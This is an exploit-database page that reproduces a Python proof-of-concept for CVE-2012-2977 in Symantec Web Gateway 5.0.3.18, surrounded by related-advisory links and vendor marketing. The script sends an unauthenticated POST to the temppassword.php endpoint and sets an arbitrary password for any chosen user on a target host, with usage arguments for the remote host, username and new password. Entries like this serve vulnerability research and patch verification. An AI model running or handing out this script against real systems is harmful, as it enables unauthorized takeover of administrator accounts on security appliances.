Lucene search
K

Symantec Web Gateway 5.0.3.18 Password Change

🗓️ 22 Aug 2012 00:00:00Reported by @_Kc57Type 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 43 Views

Symantec Web Gateway 5.0.3.18 Arbitrary Password Change through Python Scrip

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Symantec Web Gateway <= 5.0.3.18 Arbitrary Password Change (MSF)
21 Aug 201200:00
zdt
Circl
CVE-2012-2977
21 Aug 201200:00
circl
CVE
CVE-2012-2977
23 Jul 201217:00
cve
Cvelist
CVE-2012-2977
23 Jul 201217:00
cvelist
Exploit DB
Symantec Web Gateway 5.0.3.18 - Arbitrary Password Change (Metasploit)
21 Aug 201200:00
exploitdb
EUVD
EUVD-2012-2955
7 Oct 202500:30
euvd
exploitpack
Symantec Web Gateway 5.0.3.18 - Arbitrary Password Change (Metasploit)
21 Aug 201200:00
exploitpack
NVD
CVE-2012-2977
23 Jul 201217:55
nvd
OpenVAS
Symantec Web Gateway Password Change Security Bypass Vulnerability
22 Aug 201200:00
openvas
OpenVAS
Symantec Web Gateway Multiple Vulnerabilities
24 Jul 201200:00
openvas
Rows per page
`#!/usr/bin/python  
  
import urllib  
import urllib2  
import re  
import sys  
  
print "[*] ###########################################################"  
print "[*] Symantec Web Gateway <= 5.0.3.18 Arbitrary Password Change"  
print "[*] @_Kc57"  
print "[*] ###########################################################\n"  
  
  
if (len(sys.argv) != 4):  
print "Usage: poc.py <RHOST> <username> <newpassword>"  
exit(0)  
  
ip = sys.argv[1]  
username = sys.argv[2]  
password = sys.argv[3]  
  
url = "https://%s/spywall/temppassword.php" % (ip)  
  
opts = {  
'target':'executive_summary.php',  
'USERNAME':username,  
'password':password,  
'password2':password,  
'Save':'Save'  
}  
  
print "[*] Sending request to server..."  
  
data = urllib.urlencode(opts)  
request = urllib2.Request(url, data)  
response = urllib2.urlopen(request)  
  
match = re.search('Your new password has been saved', response.read())  
  
if(match):  
print "[*] Password for %s changed to %s" %(username,password)  
else:  
print "[*] Password change failed!"  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

22 Aug 2012 00:00Current
0.3Low risk
Vulners AI Score0.3
EPSS0.161
43